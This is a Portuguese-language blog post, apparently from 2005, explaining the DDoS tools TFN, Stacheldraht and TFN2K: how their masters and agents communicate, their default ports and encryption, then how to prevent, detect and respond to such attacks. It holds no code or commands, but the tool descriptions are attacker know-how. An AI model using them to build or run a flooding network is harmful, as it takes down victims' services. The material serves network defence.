TFN – TRIBE FLOOD NETWORK
O TFN é uma ferramenta distribuída usada para lançar ataques DoS coordenados a uma ou mais máquinas vítimas, a partir de várias máquinas comprometidas. Além de serem capazesde gerar ataques do tipo UDP flood como o Trin00, uma rede TFN pode gerar ataques do tipoSYN flood, ICMP flood e Smurf/Fraggle. Maiores informações a respeito destetipo de ataques podem ser encontradas em:
http://www.cert.org/advisories/CA-96.21.tcp_syn_flooding.html http://www.cert.org/advisories/CA-98.01.smurf.html
Neste tipo de ataque é possível forjar o endereço origem dos pacotes lançados às vítimas, o que dificulta qualquer processo de identificação do atacante.
No caso específico de se fazer uso do ataque Smurf/Fraggle para atingir a(s) vítima(s), o flood de pacotes é enviado às chamadas "redes intermediárias" que consolidarão o ataque, não diretamente às vítimas.
O controle remoto de uma master TFN é realizado através de comandosde linha executados pelo programa cliente. A conexão entre o atacantee o cliente pode ser realizada usando qualquer um dos métodos de conexãoconhecidos, tais como: rsh, telnet, etc. Não é necessária nenhuma senhapara executar o cliente, no entanto, é indispensável a lista dos IPs das máquinasque têm os daemons instalados. Sabe-se que algumas versões da aplicação clienteusam criptografia (Blowfish) para ocultar o conteúdo desta lista.
A comunicação entre o cliente TFN e os daemons é feita via pacotes ICMP_ECHOREPLY.Não existe comunicação TCP ou UDP entre eles.
Tanto a aplicação cliente (comumente encontrada sob o nome de tribe) como os processos daemons instalados nas máquinas agentes (comumenteencontrados sob o nome de td), devem ser executados com privilégios de usuário root.
STACHELDRAHT
Baseado no código do TFN, o Stacheldraht é outra das ferramenta distribuídas usadas para lançar ataques DoS coordenados a uma ou mais máquinas vítimas, a partir de várias máquinas comprometidas. Como sua predecessora TFN, ela também é capaz de gerar ataques DoS do tipo UDP flood, TCP flood, ICMP flood e Smurf/fraggle.
Funcionalmente, o Stacheldraht combina basicamente características das ferramentas Trin00 e TFN, mas adiciona alguns aspectos, tais como: criptografia da comunicação entre o atacante e o master;e atualização automática dos agentes.
A idéia de criptografia da comunicação entre o atacante e o master surgiuexatamente porque uma das deficiências encontradas na ferramenta TFN era que a conexão entre atacante e master era completamente desprotegida, obviamente sujeita a ataques TCP conhecidos (hijacking, por exemplo). O Stacheldraht lida com este problema incluindo um utilitário "telnet criptografado" na distribuição do código.
A atualização dos binários dos daemons instaladosnos agentes pode ser realizada instruindo o daemon a apagar a sua própria imagem e substituí-la poruma nova cópia (solaris ou linux). Essa atualização é realizada via serviço rpc (514/tcp).
Uma rede Stacheldraht é composta por um pequeno número de mastersonde rodam os programas clientes (comumente encontrados sob o nome de mserv, e um grande número de agentes, onde rodam os processos daemons (comumente encontrados sob o nome de leaf ou td). Todos eles devem ser executados com privilégios de root.
Como foi mencionado anteriormente, o controle remoto de um master Stacheldraht é feito através de um utilitário "telnet criptografado" que usa criptografia simétrica para proteger as informaçõesque trafegam até o master. Este utilitário se conecta em uma porta TCP,comumente na porta 16660/tcp.
Diferencialmente do que ocorre com o Trinoo, que utiliza pacotes UDPna comunicação entre os masters e os agentes, e do TFN, que utilizaapenas pacotes ICMP, o Stacheldraht utiliza pacotes TCP (porta padrão 65000/tcp) eICMP (ICMP_ECHOREPLY).
TFN2K - TRIBLE FLOOD NETWORK 2000
A ferramenta Tribe Flood Network 2000, mais conhecida como TFN2K, é mais umaferramenta de ataque DoS distribuída. O TFN2K é considerado umaversão sofisticada do seu predecessor TFN. Ambas ferramentas foram escritaspelo mesmo autor, Mixter.
A seguir são mencionadas algumas características da ferramenta:
Da mesma forma que ocorre no TFN, as vítimas podem ser atingidas por ataques do tipo UDP flood, TCP flood, ICMP flood ou Smurf/fraggle. O daemon podeser instruído para alternar aleatoriamente entre estes quatro tipos de ataque.
O controle remoto do master é realizado através de comandos via pacotes TCP, UDP, ICMP ou os três de modo aleatório. Estes pacotes são criptografados usando o algoritmo CAST.Deste modo, a filtragem de pacotes ou qualquer outro mecanismo passivo, torna-se impraticável e ineficiente.
Diferentemente do TFN, esta ferramenta é completamente "silenciosa", isto é, não existe confirmação (ACK) da recepção dos comandos, a comunicação de controle éunidirecional. Ao invés disso, o cliente envia 20 vezes cada comando confiando em que, ao menos uma vez, o comando chegue com sucesso.
O master pode utilizar um endereço IP forjado.
A título de ilustração se resume, através da seguinte tabelacomparativa, como é realizada a comunicação entre os"personagens" encontrados em um típico ataque DDoS, para cada uma das ferramentas:
De um modo geral, os binários das ferramentas DDoS têm sido comumente encontrados em máquinas com sistema operacional Solaris ou Linux. No entanto, o fonte dos programas pode ser facilmente portado para outras plataformas.
Ainda em relação às ferramentas, vale lembrar que a modificação do código fonte pode causar a mudança de certas propriedades da ferramenta, tais como: portas de operação, senhas de acesso e controle, nome dos comandos, etc. Isto é, a personalização da ferramenta é possível.
COMO SE PREVENIR?
Até o momento não existe uma "solução mágica" para evitar os ataques DDoS, o que sim é possível é aplicar certas estratégias para mitigar o ataque, este é o objetivo desta seção.
Dentre as estratêgias recomendadas pode-se considerar as seguintes:
Incrementar a segurança do host Sendo que a característica principal deste ataque é a formação de uma rede de máquinas comprometidas atuando como masters e agentes, recomenda-se fortemente aumentar o nível de segurança de suas máquinas, isto dificulta a formação da rede do ataque.
Instalar patches Sistemas usados por intrusos para executar ataques DDoS são comumente comprometidos via vulnerabilidades conhecidas. Assim, recomenda-se manter seus sistemas atualizados aplicando os patches quando necessário.
Aplicar filtros "anti-spoofing" Durante os ataques DDoS, os intrusos tentam esconder seus endereços IP verdadeiros usando o mecanismo de spoofing, que basicamente consite em forjar o endereço origem, o que dificulta a identificação da origem do ataque. Assim, se faz necessário que:
Os provedores de acesso implementem filtros anti-spoofing na entrada dos roteadores, de modo que ele garanta que as redes dos seus clientes não coloquem pacotes forjados na Internet.
As redes conectadas à Internet, de modo geral, implementem filtros anti-spoofing na saída dos roteadores de borda garantindo assim que eles próprios não enviem pacotes forjados na Internet.
Limitar banda por tipo de tráfego Alguns roteadores permitem limitar a banda consumida por tipo de tráfego na rede. Nos roteadores Cisco, por exemplo, isto é possível usando CAR (Commited Access Rate). No caso específico de um ataque DDoS que lança um flood de pacotes ICMP ou TCP SYN, por exemplo, você pode configurar o sistema para limitar a banda que poderá ser consumida por esse tipo de pacotes.
Prevenir que sua rede seja usada como "amplificadora" Sendo que algumas das ferramentas DDoS podem lançar ataques smurf (ou fraggle), que utilizam o mecanismo de envio de pacotes a endereços de broadcasting, recomenda-se que sejam implementadas em todas as interfaces dos roteadores diretivas que previnam o recebimento de pacotes endereçados a tais endereços. Isto evitará que sua rede seja usada como "amplificadora". Maiores informações a respeito do ataque smurf (e do parente fraggle) podem ser encontradas em: http://users.quadrunner.com/chuegen/smurf
Estabelecer um plano de contingência Partindo da premisa que não existe sistema conectado à Internet totalmente seguro, urge que sejam considerados os efeitos da eventual indisponibilidade de algum dos sistemas e se tenha um plano de contingência apropriado, se necessário for.
Planejamento prévio dos procedimentos de resposta Um prévio planejamento e coordenação são críticos para garantir uma resposta adequada no momento que o ataque está acontecendo: tempo é crucial! Este planejamento deverá incluir necessariamente procedimentos de reação conjunta com o seu provedor de backbone.
COMO DETECTAR?
As ferramentas DDoS são muito furtivas no quesito detecção. Dentre as diversaspropriedades que dificultam a sua detecção pode-se citar como mais significativa a presença de criptografia. Por outro lado, é possível modificar o código fonte de forma que as portas, senhas e valores padrões sejam alterados.
Contudo, não é impossível detectá-las. Assim, esta seção tem por objetivo apresentar alguns mecanismos que auxiliem na detecção de um eventual comprometimento da sua máquina (ou rede) que indique ela estar sendo usada em ataques DDoS. Estes mecanismos vão desde os mais convencionais até os mais modernos.
AUDITORIA
Comandos/Utilitários: Alguns comandos podem ser bastante úteis durante o processo de auditoria. Considerando os nomes padrões dos binários das ferramentas DDoS, é possível fazer uma auditoria por nome de arquivo binário usando o comando find. Caso as ferramentas não tenham sido instaladas com seus nomes padrões, é possível fazer uso do comando strings que permitiria, por exemplo, fazer uma busca no conteúdo de binários "suspeitos". Esta busca visaria achar cadeias de caracteres, senhas e valores comumente presentes nos binários das ferramentas DDoS.
O utilitário lsof pode ser usado para realizar uma auditoria na lista de processos em busca do processo daemon inicializado pelas ferramentas DDoS. Por último, se a sua máquina estiver sendo usada como master, o IP do atacante eventualmente poderia aparecer na tabela de conexões da sua máquina (netstat). Se tiver sido instalado previamente um rootkit, este IP não se revelará.
Ferramentas de auditoria de host: Ferramentas como o Tripwire podem ajudar a verificar a presença de rootkits.
Ferramentas de auditoria de rede: O uso de um scanner de portas pode revelar um eventual comprometimento da sua máquina. Lembre-se que as ferramentas DDoS utilizam portas padrões.
Assim também, analisadores de pacotes podem ser vitais na detecção de trafego de ataque. Para uma melhor análise dos pacotes é importante conhecer as assinaturas das ferramentas DDoS mais comuns. No caso específico da ferramenta TFN2K, que utiliza pacotes randômicos e criptografados, o que prejudica em muito a detecção da ferramenta por meio de análise dos pacotes, é possível alternativamente procurar nos pacotes uma característica peculiar gerada pelo processo de criptografia.
FERRAMENTAS DE DETECÇÃO ESPECÍFICAS
Uma variedade de ferramentas foram desenvolvidas para detectar ferramentas de ataque DDoS que, eventualmente, possam ter sido instaladas no seu sistema, dentre elas:
O NIPC (National Infraestructure Protection Center) disponibilizou uma ferramenta de auditoria local chamada "find_ddos" que procura no filesystem os binários do cliente e daemon das ferramentas de Trin00, TFN, Stacheldraht e TFN2K. Atualmente estão disponíveis os binários do find_ddos para Linux e Solaris em: http://www.fbi.gov/nipc/trinoo.htm Dave Dittrich, Marcus Ranum e outros desenvolveram um script de auditoria remota, chamado "gag" que pode ser usado para detectar agentes Stacheldraht rodando na sua rede local. Este script pode ser encontrado em: http://staff.wahington.edu/dittrich/misc/sickenscan.tar
Dave Dittrich, Marcus Ranum, George weaver e outros desenvolveram a ferramenta de auditoria remota chamada "dds" que detecta a presença de agentes Trin00, TFN e Stacheldraht. Ela se encontra disponível em: http://staff.washington.edu/dittrich/misc/ddos_scan.tar
SISTEMAS DE DETECÇÃO DE INTRUSÃO
Sistemas de detecção de intrusão mais modernos incluem assinaturas que permitem detectar ataques DDoS e comunicação entre o atacante, o master DDoS e o agente DDoS.
COMO REAGIR?
Se ferramentas DDoS forem instaladas nos seus sistemas
Isto pode significar que você está sendo usado como master ou agente. É importante determinar o papel das ferramentas encontradas. A peça encontrada pode prover informações úteis que permitam localizar outros componentes da rede de ataque. Priorize a identificação dos masters. Dependendo da situação, a melhor estratégia pode ser desabilitar imediatamente os masters ou ficar monitorando para coletar informações adicionais.
Se seus sistemas forem vítimas de ataque DDoS
O uso do mecanismo de spoofing nos ataques DDoS dificulta em muito a identificação do atacante. Assim, se há um momento em que pode-se fazer um backtracing e chegar ao verdadeiro responsável é no exato momento em que está ocorrendo o ataque. Isto significa que é imprescindível a comunicação rápida com os operadores de rede do seu provedor de acesso/backbone.
Considere que, devido à magnitude do ataque, não é recomendável confiar na conectividade Internet para comunicação durante um ataque. Portanto, certifíque-se que sua política de segurança inclua meios alternativos de comunicação (telefone celular, pager, sinais de fumaça, etc). Mas, por favor , aja rápido, tempo é crucial!
CONSIDERAÇÕES FINAIS
Não existe "solução mágica" para evitar os ataques DDoS, não com a tecnologia atual.
No lugar, existem certas estratégias que podem ser aplicadas pelos administradores e gerentes de rede para mitigá-lo. Sem dúvida, sem se conhecer o que acontece nos bastidores será uma tarefa difícil. Assim, o motivo deste artigo foi justamente desmistificar o ataque de modo que estes profissionais, conhecendo melhor o inimigo, se preparem melhor para combatê-lo.
By XKN (2005)[/b]
_________________
By XKN @ -= ProxysX GrouP =-
Nenhum comentário:
Postar um comentário